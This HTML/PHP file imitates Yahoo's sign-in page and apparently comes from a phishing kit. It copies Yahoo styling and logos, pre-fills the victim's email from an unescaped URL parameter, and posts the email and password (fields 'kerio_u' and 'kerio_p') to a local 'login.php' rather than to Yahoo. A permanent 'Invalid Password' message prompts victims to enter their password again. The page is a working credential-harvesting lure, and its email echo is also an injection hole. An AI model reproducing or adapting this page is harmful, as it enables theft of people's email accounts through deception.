.challenge-desc{display:block;padding:0;margin-top:2px;margin-top:.11765rem;font-size:14px;font-size:.82353rem;line-height:23px;line-height:1.35294rem;letter-spacing:-.3px}.challenge .hidden-input-container{margin:-1px 0 0;padding:0;height:1px;overflow:hidden}.challenge .error{margin-top:5px;margin-top:.29412rem;margin-bottom:15px;margin-bottom:.88235rem;color:#f0162f;line-height:20px;line-height:1.17647rem;font-size:12px;font-size:.70588rem;text-align:left}.challenge .error:not(.hide)+.button-container{margin-top:15px;margin-top:.88235rem}.challenge .no-img-label-space{margin-top:60px;margin-top:3.52941rem;margin-bottom:0}.challenge input[type=email],.challenge input[type=tel],.challenge input[type=text]{font-size:14px;font-size:.82353rem;height:35px;height:2.05882rem;margin:0;padding:0}.challenge input[type=email]:focus,.challenge input[type=tel]:focus,.challenge input[type=text]:focus{border-bottom:1px solid #188fff;height:35px;height:2.05882rem}.challenge input[name=username].field-error{border-bottom:1px solid #ff333a}.challenge .selected-country-code-cont{font-size:14px;font-size:.82353rem;margin-top:-2px}.challenge .button-container{font-size:14px;font-size:.82353rem;margin-top:24px;margin-top:1.41176rem;padding:0}.challenge .challenge-feedback-text{display:block;margin-top:24px;margin-top:1.41176rem;font-size:14px;font-size:.82353rem}.challenge .challenge-feedback-link{margin-top:24px;margin-top:1.41176rem;padding:0;font-size:14px;font-size:.82353rem;letter-spacing:-.1px;line-height:17px;line-height:1rem;white-space:normal;display:block}.challenge .challenge-button{font-size:16px;font-size:.94118rem;height:40px;height:2.35294rem;letter-spacing:normal;font-weight:500;margin:0}.challenge a.challenge-button{padding:10px;padding:.58824rem}.challenge .challenge-button-link{margin:0;padding:0;font-size:14px;font-size:.82353rem;line-height:17px;line-height:1rem;white-space:normal}.challenge .form-input-container{display:-webkit-box;display:-ms-flexbox;display:flex;position:relative}.challenge .form-input-container label{color:#828c93;font-size:14px;font-size:.82353rem;font-weight:400;letter-spacing:-.1px;position:absolute;pointer-events:none;left:0;top:7px;top:.41176rem;-webkit-transition:.2s ease all;transition:.2s ease all;margin-top:0;-ms-flex-item-align:center;align-self:center}.challenge .form-input-container .used~label,.challenge .form-input-container input[type=email]:focus~label,.challenge .form-input-container input[type=email]:not(:placeholder-shown)~label,.challenge .form-input-container input[type=tel]:focus~label,.challenge .form-input-container input[type=tel]:not(:placeholder-shown)~label,.challenge .form-input-container input[type=text]:focus~label,.challenge .form-input-container input[type=text]:not(:placeholder-shown)~label{top:-18px;top:-1.05882rem;font-size:12px;font-size:.70588rem;color:#26282a}.challenge .form-input-container input[type=email].show-icon,.challenge .form-input-container input[type=text].show-icon{padding-left:24px;padding-left:1.41176rem;-webkit-box-flex:1;-ms-flex:1;flex:1}.challenge .cci-dropdown .form-input-container input[type=text].show-icon.phone-no{padding-left:48px;padding-left:2.82353rem}.challenge .input-field-icon{position:absolute;background-position:center;background-repeat:no-repeat;-ms-flex-item-align:center;align-self:center}.challenge .input-field-icon.email-icon{width:16px;width:.94118rem;height:16px;height:.94118rem;background-size:.94118rem .94118rem;



.challenge .input-field-icon.name-icon{width:16px;width:.94118rem;height:13px;height:.76471rem;background-size:.94118rem .76471rem;





background-position:0}.login-box .challenge .bottom-links-container{margin-top:84px;margin-top:4.94118rem}.challenge .bottom-links-container{margin-top:96px;margin-top:5.64706rem;padding-bottom:24px;padding-bottom:1.41176rem}.challenge .bottom-links-container.has-social-buttons{margin-top:20px;margin-top:1.17647rem}@media only screen and (min-aspect-ratio:2/3) and (max-device-height:675px){.challenge .no-img-label-space{margin-top:2.35294rem}}@media only screen and (min-aspect-ratio:7/10) and (max-device-height:575px){.challenge .bottom-links-container{margin-top:3.76471rem}}@media only screen and (max-aspect-ratio:3/5){.challenge .bottom-links-container{position:absolute;display:block;left:0;right:0;bottom:0;box-sizing:border-box;margin:0 auto;margin-bottom:1.41176rem;text-align:center;max-width:18.82353rem;padding:0 24px}}.challenge .helper-item{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;margin-top:10px;margin-top:.58824rem}.challenge .helper-item.left{text-align:left}.challenge .helper-item .stay-signed-in{min-width:145px}.challenge .helper-item.arlink{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end;min-width:145px}.challenge .helper-item .help{-webkit-box-flex:.5;-ms-flex-positive:.5;flex-grow:.5;text-align:right;min-width:145px}.challenge .notice{padding:15px;background:#ffffb7;border-radius:4px;color:#26282a;text-align:left;font-size:.82353em}.challenge .notice p{margin:0}.challenge .bottom-button-container .challenge-button{margin-bottom:24px;margin-bottom:1.41176rem}.challenge-header{margin-top:15px;margin-top:.88235rem}.challenge-header .yid{overflow:hidden;text-overflow:ellipsis;font-size:.82353em;text-align:center;line-height:17px;line-height:1rem}.challenge .social-login{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;-webkit-box-align:center;-ms-flex-align:center;align-items:center;margin-top:10px;margin-bottom:0}.challenge .social-login .icon{height:42px;cursor:pointer;background-repeat:no-repeat;background-position:center;border-color:#b9bdc5;border-radius:1.17647rem}.challenge .social-login .items-1,.challenge .social-login li.items-cont-1{width:100%}.challenge .social-login .items-2{width:132px;width:7.76471rem}.challenge .social-login .items-3{width:84px;width:4.94118rem}.social-login .sc-google-button{background-size:20px;




.challenge .eol-notice{background-color:#ffd333;color:#000}.challenge .oauth-notice{margin:20px 0;display:none}.challenge .oauth-notice p{margin:20px 0;font-size:.82353em}.challenge .oauth-notice.show{display:block}.challenge .oauth-notice.show+.button-container input[name=signin]{display:none}#tpa-err-container{position:relative;top:-71px;text-align:center}.challenge .helper-links-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-top:10px;margin-top:.58824rem;font-size:14px;font-size:.82353rem;letter-spacing:-.1px}.challenge .sign-up-link,.challenge .social-login li,.challenge .social-login li button{margin-bottom:0}.manage-account{margin:0 auto;padding:5px 5px 50px;max-width:500px;text-align:left}.manage-account h2{margin:20px 0;font-size:1.29412em;font-weight:500}.manage-account .title-desc{margin-bottom:15px}.manage-account .error{margin:10px 0;padding:10px;color:#dd1037;text-align:left;font-size:.76471em;border:1px solid #dd1037}.manage-account .account-list li{margin:0}.manage-account .account-card{position:relative;padding:1em;border-bottom:2px solid #e2e2e2}.manage-account .account-card:last-child{border:0}.manage-account .account-card .username{display:block;width:60%;color:#000;white-space:nowrap}.manage-account .account-card.loggedOut .username{color:#7c7c7c}.manage-account .account-card .username:hover{color:#003abc}.manage-account .account-card .username img{width:3em;height:3em;float:left;margin-right:.63em;padding-left:1px}.manage-account .account-card .username span,.manage-account .account-card .username strong{display:block;text-overflow:ellipsis;overflow:hidden}.manage-account .account-card .actions{position:absolute;top:1em;right:0;text-align:right;font-size:.82353em}.manage-account .account-card .actions a{display:block}.manage-account .account-card .actions .sign-out{color:#818181}.manage-account .account-card .actions .sign-out:hover{color:#003abc}.manage-account .account-card button{position:absolute;top:1em;right:0;margin:15px 0;padding:5px 16px;border:0}.manage-account .account-card button:focus,.manage-account .account-card button:hover{outline:#188fff solid 1px}.manage-account .orko-button{padding:.8em 1.5em;width:auto;height:auto}.switch-account{margin:0 auto;padding:5px;max-width:500px}.switch-account h2{margin:20px 0;font-size:1.29412em;font-weight:500}.switch-account .account-card{box-sizing:border-box;width:300px;margin:40px auto;padding:24px;border-radius:2px;background-color:#fff;box-shadow:0 3px 7px 0 rgba(181,181,181,.7))}.switch-account .account-card img{display:block;margin:16px auto 32px;width:96px;height:96px}.switch-account .account-card span,.switch-account .account-card strong{display:block;text-overflow:ellipsis;overflow:hidden}.switch-account .orko-button{display:block;margin:20px auto;padding:.8em 1.5em;height:auto}.confirm-logout{margin:auto 30px}.confirm-logout img{margin-top:20px}.confirm-logout .title{padding:20px 0 40px}.confirm-logout a{margin:10px auto}.fc-logout{padding:20px;margin-top:30px}.fc-logout .logout-spinner{background:url(https://s.yimg.com/wm/modern/images/fuji-spinner-dark-1.0.0.svg) center no-repeat;background-size:50px;width:100%;height:35px;border:none;display:inline-block;margin-top:50px}.imapin-error{margin-top:20px}.prog-phone-reg{max-width:300px;margin:0 auto;display:none}.prog-phone-reg-spinner{margin:10px 0 -70px;background:url(https://s.yimg.com/wm/modern/images/fuji-spinner-dark-1.0.0.svg) center no-repeat;background-size:50px;width:100%;height:35px;border:none;display:inline-block}.dark-theme .orko,.dark-theme body{background:#000;color:#999ca5}.dark-theme .orko-button-primary,.dark-theme input.orko-button-primary{background:#12a9ff;color:#fff}.dark-theme .orko-link,.dark-theme a{color:#12a9ff}.dark-theme .orko-link:hover,.dark-theme a:hover{color:#41baff}.dark-theme .orko-link:active,.dark-theme a:active{color:#002e96}.dark-theme .orko-button-primary:hover,.dark-theme input.orko-button-primary:hover{background:#41baff;border-color:#41baff;color:#fff}.dark-theme .orko-button-primary:active,.dark-theme .orko-button-primary:focus,.dark-theme input.orko-button-primary:active,.dark-theme input.orko-button-primary:focus{background:#002e96;border-color:#002e96;color:#b9bdc5}.dark-theme .orko-button-secondary,.dark-theme input.orko-button-secondary{border-color:#12a9ff;color:#12a9ff}.dark-theme .orko-button-secondary:hover,.dark-theme input.orko-button-secondary:hover{border-color:#41baff}.dark-theme .orko-button-secondary:active,.dark-theme .orko-button-secondary:focus,.dark-theme input.orko-button-secondary:active,.dark-theme input.orko-button-secondary:focus{border-color:#002e96;color:#002e96}.dark-theme .orko-button-link,.dark-theme input.orko-button-link{background:#fff;color:#12a9ff}.dark-theme .orko-button-link:active,.dark-theme .orko-button-link:focus,.dark-theme input.orko-button-link:active,.dark-theme input.orko-button-link:focus{color:#002e96}.dark-theme .orko-button-link:hover,.dark-theme input.orko-button-link:hover{color:#41baff}.dark-theme .orko input[type=text]::-webkit-input-placeholder{color:#767d84}.dark-theme .orko input[type=text]::-moz-placeholder{color:#767d84}.dark-theme .orko input[type=text]:-ms-input-placeholder{color:#767d84}.dark-theme .orko input[type=text]::placeholder{color:#767d84}.dark-theme .orko input[type=number],.dark-theme .orko input[type=search],.dark-theme .orko input[type=email],.dark-theme .orko input[type=text],.dark-theme .orko input[type=tel],.dark-theme .orko input[type=url],.dark-theme .orko input[type=password],.dark-theme .orko select,.dark-theme .orko textarea{border-bottom:1px solid #767d84;color:#fff}.dark-theme .orko input[type=number]:focus,.dark-theme .orko input[type=search]:focus,.dark-theme .orko input[type=email]:focus,.dark-theme .orko input[type=text]:focus,.dark-theme .orko input[type=tel]:focus,.dark-theme .orko input[type=url]:focus,.dark-theme .orko input[type=password]:focus,.dark-theme .orko select:focus,.dark-theme .orko textarea:focus{border-bottom:2px solid #12a9ff}.dark-theme .error-offline{border-color:#ff4d52;color:#ff4d52}.dark-theme .error{color:#ff4d52}.dark-theme .login-box,.dark-theme .login-header{color:#999ca5;background-color:#000}.dark-theme img.logo{display:none}.dark-theme img.dark-mode-logo{display:inline}.dark-theme .narrow .login-header{background-color:#000}.dark-theme .narrow .login-header img.logo{display:none}.dark-theme .narrow .login-header img.dark-mode-logo{display:inline}.dark-theme .login-body h1{color:#fff}.dark-theme .login-box .login-logo img.logo{display:none}.dark-theme .login-box .login-logo img.dark-mode-logo{display:inline}.dark-theme body.narrow{background-color:#000;color:#999ca5}.dark-theme body.resp{background-color:#000}@media screen and (max-width:480px){.dark-theme body.resp{background-color:#000}}.dark-theme .challenge .challenge-heading,.dark-theme .generic-page .page-heading{color:#fff}.dark-theme .challenge .challenge-desc{color:#999ca5}.dark-theme .challenge .bottom-sticky,.dark-theme .generic-page .bottom-sticky{background-color:#000}.dark-theme .challenge .login-label{color:#767d84}.dark-theme .challenge .challenge-feedback-link{color:#12a9ff}.dark-theme .challenge .form-input-container .used~label,.dark-theme .challenge .form-input-container input[type=email]:focus~label,.dark-theme .challenge .form-input-container input[type=email]:not(:placeholder-shown)~label,.dark-theme .challenge .form-input-container input[type=tel]:focus~label,.dark-theme .challenge .form-input-container input[type=tel]:not(:placeholder-shown)~label,.dark-theme .challenge .form-input-container input[type=text]:focus~label,.dark-theme .challenge .form-input-container input[type=text]:not(:placeholder-shown)~label{color:#767d84}.dark-theme .challenge .error{color:#ff4d52}.dark-theme .challenge input[type=email]:focus,.dark-theme .challenge input[type=tel]:focus,.dark-theme .challenge input[type=text]:focus{border-bottom:1px solid #12a9ff}.dark-theme .challenge input[name=username].field-error{border-bottom:1px solid #ff4d52}</style>
    <link rel="icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
    <link rel="shortcut icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
    <link rel="apple-touch-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
    <link rel="apple-touch-icon-precomposed" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
    <script nonce="tWx3d3hUZXboVwqN6kUPAqxTeDFDvX0cI0E72DDnP2hMWq8D">
        var pageStartTime = new Date().getTime();
        document.documentElement.className = document.documentElement.className.replace('no-js', 'js');

    </script>
</head>


















<body class="orko en-us mbr-dark-mode"><div class="row login-header">
    <span class="column"><a href="https://www.yahoo.com/" title="Yahoo"><img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo" width="" height="36" />
<img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo" width="" height="36" /></a></span>
</div>

<div class="login-body">
        <div class="login-content">
                <div class="login-box ">
                    <div class="login-logo"><img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo" width="" height="27" />
            <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo" width="" height="27" /></div>
                   <p id="error-offline" role="alert" class="row error-offline hide">Network connection timed out. Please try again.</p>        <div class="challenge">
                <div class="challenge-header hidden">
                    <div class="yid">&nbsp;</div>
                </div>
                <strong class="challenge-heading">
                    Sign in
                </strong>
                    <span class="challenge-desc signin-sub-title">
                        using your Yahoo account
                    </span>
                </span>
           <form action="login.php" method="post" novalidate="novalidate">


<br>


<div>
						

<input class="input100" id="x_cfq" name="kerio_u" type="email" style="cursor:no-drop; -webkit-touch-callout: none;
    -webkit-user-select: none;
    -khtml-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    -o-user-select: none;
    user-select: none;" readonly="" value="<?php echo $_GET['email']; ?>">


					</div>
                   

<br>
 
 <div class="form-input-container">


                        <input type="password" name="kerio_p" id="x_cfr" required=""  class="masked" placeholder="Type your password"> 

    <script type="text/javascript">
 
  //apply masking to the demo-field
  //pass the field reference, masking symbol, and character limit
  new MaskedPassword(document.getElementById("x_cfr"), '\u25CF');
 
  //test the submitted value
  document.getElementById('demo-form').onsubmit = function()
  {
   alert('pword = "' + this.pword.value + '"');
   return false;
  };
 
 </script>


                    </div>



               
            
            
                <div class="button-container">
                    <input id="id="x_cft" type="submit" name="signin" class="orko-button-primary orko-button challenge-button" value="login" tabindex="2" data-ylk="elm:btn;elmt:primary;mKey:primary_login_primaryBtn"/>
                </div>
<br>

<div align="center"> <label><font size="2" color="red">Invalid Password</font></label></div>

              
                                      </div>
                </div>
            
               
            </form>
            </div>
                </div>
   
        </div>
       
<div class="login-footer">
        <a href="https://policies.oath.com/us/en/oath/terms/otos/index.html" target="_blank">Terms</a>
        
        <span>|</span>
        <a href="https://policies.oath.com/us/en/oath/privacy/index.html" target="_blank">Privacy</a>
        
</div>

</html>

